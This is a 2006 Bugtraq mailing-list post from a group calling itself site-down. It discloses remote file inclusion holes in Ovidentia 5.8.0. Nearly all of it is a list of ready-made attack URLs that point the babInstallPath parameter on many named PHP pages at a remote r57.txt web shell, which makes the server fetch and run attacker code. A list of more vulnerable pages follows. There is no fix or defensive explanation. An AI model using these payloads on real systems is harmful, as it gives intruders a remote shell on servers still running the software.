
Date: 31 May 2006 22:48:59 -0000
From: black-cod3@...mail.com
To: bugtraq@...urityfocus.com
Subject: multiple file inclusion exploits in ovidentia v5.8.0


multiple file inclusion exploits in ovidentia v5.8.0

forum type : ovidentia v5.8.0
bug found by : black-code&sweet-devil
team : site-down
type : file include 

####################################################
exploits :


http://www.example.com/orid/index.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/topman.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/approb.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/vacadmb.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/vacadma.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/vacadm.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/statart.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/search.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/posts.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/options.php?babInstallPath=http://Yoursite.com/r57.txt?



And more pages are vulnerabe in the directory  /ovidentia/ with the same variable, 

as an example :

login.php

frchart.php

flbchart.php

fileman.php

faq.php

event.php

directory.php

articles.php

artedit.php

approb.php

calday.php


And more .. ;)



####################################################



#######################
emails: 

black-cod3@...mail.com  &  gamr-14@...mail.com
#######################


All my respect to our friends , lezr.com , g123g.net 


done .. peace


